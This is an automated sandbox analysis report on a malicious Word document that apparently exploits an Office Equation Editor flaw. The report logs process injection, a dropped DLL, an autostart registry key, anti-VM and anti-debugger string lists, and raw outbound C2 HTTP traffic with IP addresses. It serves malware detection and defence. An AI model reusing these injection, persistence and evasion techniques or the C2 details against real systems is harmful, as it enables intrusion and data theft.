
Analysis Report

Overview

General Information

Joe Sandbox Version: 21.0.0
Analysis ID: 487031
Start time: 19:13:34
Joe Sandbox Product: Cloud
Start date: 24.01.2018
Overall analysis duration: 0h 9m 10s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: DoNotOpen2.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
Detection: MAL
Classification: mal96.evad.expl.troj.winDOC@7/13@7/2
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 43
  • Number of non-executed functions: 73
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 27
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, WMIADAP.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE


Detection

Strategy    Score   Range     Reporting        Detection
Threshold   96      0 - 100   Report FP / FN   malicious


Confidence

Strategy    Score   Range   Further Analysis Required?   Confidence
Threshold   5       0 - 5   false


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Signature Overview



Exploits:

Office Equation Editor has been started
Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding (reported 2 times)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process created: C:\Program Files\Internet Explorer\iexplore.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Window created: window name: CLIPBRDWNDCLASS

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: api.ipaddress.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.1.16:49188 -> 209.126.119.177:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.1.16:49188 -> 209.126.119.177:80
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: a.b.1.dr

Networking:

Downloads files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected:
GET /myip?format=txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: api.ipaddress.com
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: api.ipaddress.com
Posts data to webserver
Source: unknown | HTTP traffic detected:
POST /goix/nhbqad.asp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: application/jason,application/xml, q=0.9,*/*, q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Cookie: 339hndxz=0wEEgqeI/L2qQmlVILDcCEjSuUvCsdzViNvvozbedxbAdA==; o49jg=zWVEEy8HHngAYbc+1rE0gJkrvAStoctjYgNpv4k6Szt9NkBBW93Ico9ieReFMojFzEeoAHCYHUFDrRQsvDbgYVM2KqbYbWq/OaEJQ5mDN6c=; 5f51il=InuyYTmulipC/qjau0zml1Nu7+ym09aui/5ksuwxMGq7sY44kB6xGZGq/lwuTsKXbhsr7wKboki43IbVzk8H3Si3N/B0rCRkIuwEFKiK8ys=;
Host: 3.sj2xp1.paj.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Length: 3394
Urls found in memory or binary data
Source: WINWORD.EXE | String found in binary or memory: file:///
Source: WINWORD.EXE | String found in binary or memory: file:///C:
Source: WINWORD.EXE | String found in binary or memory: file:///C:/Users/user/Desktop/DoNotOpen2.doc
Source: WINWORD.EXE | String found in binary or memory: file:///C:/Users/user/Desktop/DoNotOpen2.docE
Source: WINWORD.EXE | String found in binary or memory: file:///C:/Users/user/Desktop/DoNotOpen2.docO
Source: explorer.exe | String found in binary or memory: file:///C:/Users/user/Documents
Source: explorer.exe | String found in binary or memory: file:///C:/Users/user/Documentsrs
Source: iexplore.exe | String found in binary or memory: http://
Source: iexplore.exe | String found in binary or memory: http://%s
Source: iexplore.exe | String found in binary or memory: http://%sConnectType
Source: iexplore.exe | String found in binary or memory: http://103.236.150.14
Source: iexplore.exe | String found in binary or memory: http://103.236.150.14192.168.1.16
Source: iexplore.exe | String found in binary or memory: http://api.ipaddress.com/myip?format=txt
Source: iexplore.exe | String found in binary or memory: http://api.ipaddress.com/myip?format=txt1
Source: iexplore.exe | String found in binary or memory: http://https://:
Source: iexplore.exe | String found in binary or memory: http://https://Try
Source: WINWORD.EXE | String found in binary or memory: http://schemas.openx
Source: WINWORD.EXE | String found in binary or memory: http://schemas.openxDV
Source: WINWORD.EXE | String found in binary or memory: http://schemas.openxmlformat
Source: WINWORD.EXE | String found in binary or memory: http://schemas.openxmlformatDV
Source: explorer.exe | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: WINWORD.EXE | String found in binary or memory: http://www.
Source: explorer.exe | String found in binary or memory: http://www.%s.comPA
Source: WINWORD.EXE | String found in binary or memory: http://www.msnusers.com
Source: iexplore.exe | String found in binary or memory: https://
Source: iexplore.exe | String found in binary or memory: https://%s
Source: iexplore.exe | String found in binary or memory: https://%sTry
Source: explorer.exe | String found in binary or memory: https://en.wikipedia.org/wiki/XSLT/Muenchian_grouping
May check the online IP address of the machine
Source: unknown | DNS query: name: api.ipaddress.com (reported 7 times)

Boot Survival:

Creates an autostart registry key
Source: C:\Program Files\Internet Explorer\iexplore.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD (reported 4 times)
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Program Files\Internet Explorer\iexplore.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD

Remote Access Functionality:

Contains functionality to launch a control shell (cmd.exe)
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: \cmd.exe /c 3_2_00515486

Stealing of Sensitive Information:

Searches for user specific document files
Source: C:\Windows\explorer.exe | Key value created or modified: C:\Users\user\Documents
Source: C:\Windows\explorer.exe | Key value created or modified: C:\Users\user\Documents
Source: C:\Windows\explorer.exe | Key value created or modified: C:\Users\Public\Documents
Source: C:\Windows\explorer.exe | Key value created or modified: C:\Users\user\Documents
Source: C:\Windows\explorer.exe | Key value created or modified: C:\Users\user\Documents\QLSSZNHVJI

Persistence and Installation Behavior:

Contains functionality to read ini properties file for application configuration
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_005114F8 memset,memset,memset,SHGetSpecialFolderPathW,___swprintf_l,GetPrivateProfileStringW,memset,memset,_wfopen,fgetws,wcsstr,wcsstr,_wtoi,feof,fclose,___swprintf_l,3_2_005114F8
Drops PE files
Source: C:\Program Files\Internet Explorer\iexplore.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user~1\AppData\Local\Temp\a.b
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user~1\AppData\Local\Temp\a.b

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00517143 GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,GetUserNameA,MultiByteToWideChar,WideCharToMultiByte,ConvertSidToStringSidA,3_2_00517143
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B34A3 push ecx; ret 2_2_617B34B6
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B3329 push ecx; ret 2_2_617B333C

System Summary:

Reads the Windows registered owner settings
Source: C:\Program Files\Internet Explorer\iexplore.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Uses Rich Edit Controls
Source: C:\Windows\explorer.exe | File opened: C:\Windows\system32\MsftEdit.dll
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to development resources
Source: iexplore.exe | Binary or memory string: 3.vbP.v
Classification label
Source: classification engine | Classification label: mal96.evad.expl.troj.winDOC@7/13@7/2
Contains functionality to check free disk space
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00516D52 GetModuleHandleW,GetProcAddress,GetTempPathW,GetDiskFreeSpaceExW,3_2_00516D52
Contains functionality to enum processes or threads
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_004F2A05 CreateToolhelp32Snapshot,memset,memset,Process32FirstW,___swprintf_l,Process32NextW,CloseHandle,3_2_004F2A05
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$NotOpen2.doc
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user~1\AppData\Local\Temp\CVR12AE.tmp
Launches a second explorer.exe instance
Source: unknown | Process created: C:\Windows\explorer.exe (reported 2 times)
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the Windows registered organization settings
Source: C:\Program Files\Internet Explorer\iexplore.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Spawns processes
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\DoNotOpen2.doc
Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll,Setting
Source: unknown | Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Uses an in-process (OLE) Automation server
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{35786D3C-B075-49b9-88DD-029876E11C01}\InProcServer32
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)
Source: NavShExt.dll.3.dr | Static PE information: Section: .data ZLIB complexity 0.998944256757
Detected potential crypto function
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B223D
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_004F13F5
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00513ABC
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00519361
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00519958
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_005186ED
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00519591
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00518EF8
Found potential string decryption / allocating functions
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: String function: 00517FBE appears 69 times
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user~1\AppData\Local\Temp\a.b

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: iexplore.exe, explorer.exe | Binary or memory string: Progman
Source: iexplore.exe, explorer.exe | Binary or memory string: Program Manager
Source: iexplore.exe, explorer.exe | Binary or memory string: Shell_TrayWnd
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Process created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Contains functionality to inject code into remote processes
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B223D Setting,IsDebuggerPresent,CreateMutexA,GetLastError,CloseHandle,CloseHandle,memset,SHGetSpecialFolderPathA,memset,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,CreateProcessA,memset,GetModuleFileNameA,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,GetProcAddress,CreateRemoteThread,WaitForSingleObject,WaitForSingleObject,GetExitCodeThread,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,CloseHandle,2_2_617B223D
Contains functionality to inject threads in other processes
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B223D (same API sequence as listed under "Contains functionality to inject code into remote processes")

Anti Debugging:

Contains functionality to register its own exception handler
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B2860 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_617B2860
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_004F32A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_004F32A0
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_0051A460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0051A460
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | System information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B223D Setting,IsDebuggerPresent,CreateMutexA,GetLastError,CloseHandle,CloseHandle,memset,SHGetSpecialFolderPathA,memset,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,CreateProcessA,memset,GetModuleFileNameA,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,GetProcAddress,CreateRemoteThread,WaitForSingleObject,WaitForSingleObject,GetExitCodeThread,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,CloseHandle,2_2_617B223D
Contains functionality to dynamically determine API calls
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00517143 GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,GetUserNameA,MultiByteToWideChar,WideCharToMultiByte,ConvertSidToStringSidA,3_2_00517143

Malware Analysis System Evasion:

Contains functionality to query system information
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00517535 GetSystemInfo,3_2_00517535
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: iexplore.exe | Binary or memory string: vmtools.exe
Source: iexplore.exe | Binary or memory string: SYSTEM\ControlSet001\services\Disk\Enum0x3A RegOpenKeyExW Disk Failed-%d0vmwareqemuvboxvirtualhdSoftware\CommViewSoftware\eEye Digital SecuritySoftware\Win SnifferSoftware\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32Software\Syser SoftSoftware\Classes\Folder\shell\sandboxSoftware\Classes\*\shell\sandboxSYSTEM\CurrentControlSet\Services\IRIS5SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WiresharkSOFTWARE\ZxSnifferSYSTEM\CurrentControlSet\Services\VBoxGuestSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest AdditionsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSandboxie%svboxtray.exevboxservice.exevmwareuser.exevmwaretray.exevmupgradehelper.exevmtoolsd.exevmacthlp.exevmtools.exeirise.exeIrisSvc.exewireshark.exeZxSniffer.exeRegshot.exeollydbg.exewindbg.exePEBrowseDbg.exeSyser.exeSandboxieRpcSs.exeSandboxieDcomLaunch.exe%02X%02X%02X%02X%02X%02X 000569000C29001C1400505600155D00163E080027H
Source: iexplore.exe | Binary or memory string: SYSTEM\CurrentControlSet\Services\VBoxGuest
Source: iexplore.exe | Binary or memory string: vmware
Source: iexplore.exe | Binary or memory string: vmwaretray.exe
Source: iexplore.exe | Binary or memory string: vmwareuser.exe
Source: iexplore.exe | Binary or memory string: vmtoolsd.exe
Source: iexplore.exe | Binary or memory string: vboxservice.exe
Source: iexplore.exe | Binary or memory string: vboxtray.exe
Contains functionality to query network adapter information
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: ??2@YAPAXI@Z,memset,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,memset,___swprintf_l,??3@YAXPAX@Z,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_004F2FA1
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: ??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,___swprintf_l,realloc,___swprintf_l,___swprintf_l,realloc,___swprintf_l,realloc,___swprintf_l,??3@YAXPAX@Z,3_2_005177AB
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: ??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,3_2_00514B82
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: ??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,3_2_00514AAC
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 816
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Dropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\a.b
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 3440 | Thread sleep time: -60000s >= -60000s (reported 2 times)
Source: C:\Windows\explorer.exe TID: 3540 | Thread sleep time: -180000s >= -60000s
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 3536 | Thread sleep time: -60000s >= -60000s
Contains functionality to detect sandboxes (MAC address check)
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_004F2FA1 ??2@YAPAXI@Z,memset,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,memset,___swprintf_l,??3@YAXPAX@Z,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_004F2FA1 (reported 3 times)
Contains functionality to detect sandboxes (registry check)
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC (reported 11 times)
Contains functionality to detect virtual machines (IN, VMware)
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_004F278F in eax, dx 3_2_004F278F
Tries to detect sandboxes and other dynamic analysis tools (process name)
Source: iexplore.exe | Binary or memory string: WINDBG.EXE
Source: iexplore.exe | Binary or memory string: IRISE.EXE
Source: iexplore.exe | Binary or memory string: SANDBOXIERPCSS.EXE
Source: iexplore.exe | Binary or memory string: WIRESHARK.EXE
Source: iexplore.exe | Binary or memory string: IRISSVC.EXE
Source: iexplore.exe | Binary or memory string: ZXSNIFFER.EXE
Source: iexplore.exe | Binary or memory string: PEBROWSEDBG.EXE
Source: iexplore.exe | Binary or memory string: SYSER.EXE
Source: iexplore.exe | Binary or memory string: OLLYDBG.EXE
Source: iexplore.exe | Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE
Source: iexplore.exe | Binary or memory string: REGSHOT.EXE
Tries to detect virtual machines
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: vboxtray.exe vboxservice.exe vboxservice.exe vmwareuser.exe vmwaretray.exe vmtoolsd.exe vmtools.exe 3_2_004F2A05
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: vmware qemu qemu vbox 3_2_004F27E5

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX

Language, Device and Operating System Detection:

Contains functionality to query local / system time
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_617B3362 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter | 2_2_617B3362
Contains functionality to query the account / user name
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_00517143 GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,GetUserNameA,MultiByteToWideChar,WideCharToMultiByte,ConvertSidToStringSidA | 3_2_00517143
Queries the cryptographic machine GUID
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query locale information (e.g. system language)
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,__swprintf_c_l | 3_2_00516DF6
Queries information about the installed CPU (vendor, model number etc.)
Source: C:\Program Files\Internet Explorer\iexplore.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor
Queries the product ID of Windows
Source: C:\Program Files\Internet Explorer\iexplore.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Program Files\Internet Explorer\iexplore.exe | Code function: 3_2_005163DA GetLocalTime followed by cmp: cmp word ptr [esp+12h], 0010h and CTI: jne 005164DCh | 3_2_005163DA

Behavior Graph

(Graph image not reproduced; the information recoverable from it is listed below.)

Behavior Graph ID: 487031, Sample: DoNotOpen2.doc, Startdate: 24/01/2018, Architecture: WINDOWS, Score: 96

  • Signatures on the sample: Document exploit detected (drops PE files); May check the online IP address of the machine; Contains functionality to detect virtual machines (IN, VMware); 8 other signatures
  • Processes started from the sample: WINWORD.EXE, EQNEDT32.EXE, EQNEDT32.EXE, 2 other processes
  • WINWORD.EXE: dropped C:\Users\user~1\AppData\Local\Temp\a.b (PE32)
  • EQNEDT32.EXE: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); started iexplore.exe
  • iexplore.exe: DNS lookup of api.ipaddress.com; connections to api.ipaddress.com 209.126.119.177 (port 49188 -> 80, SERVER4YOU-server4youIncUS, United States) and 103.236.150.14 (port 49189 -> 80, IDNIC-SERVERKEREN-AS-IDPTExaRekatekProsolusiID, Indonesia); dropped C:\Users\user\AppData\...\NavShExt.dll (PE32); Creates an autostart registry key pointing to binary in C:\Windows
  • api.ipaddress.com: May check the online IP address of the machine

Simulations

Behavior and APIs

Time | Type | Description
19:15:15 | API Interceptor | 340x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 5000ms
19:15:17 | API Interceptor | 3x Sleep call for process: EQNEDT32.EXE modified from: 60000ms to: 5000ms
19:15:18 | API Interceptor | 938x Sleep call for process: explorer.exe modified from: 60000ms to: 5000ms
19:15:20 | API Interceptor | 2x Sleep call for process: WINWORD.EXE modified from: 30000ms to: 5000ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot

Startup

  • System is w7_1
  • WINWORD.EXE (PID: 3368 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\DoNotOpen2.doc MD5: 5D798FF0BE2A8970D932568068ACFD9D)
  • EQNEDT32.EXE (PID: 3420 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • iexplore.exe (PID: 3444 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: EE79D654A04333F566DF07EBDE217928)
  • explorer.exe (PID: 3488 cmdline: explorer.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll,Setting MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • EQNEDT32.EXE (PID: 3496 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • explorer.exe (PID: 3544 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\a.b
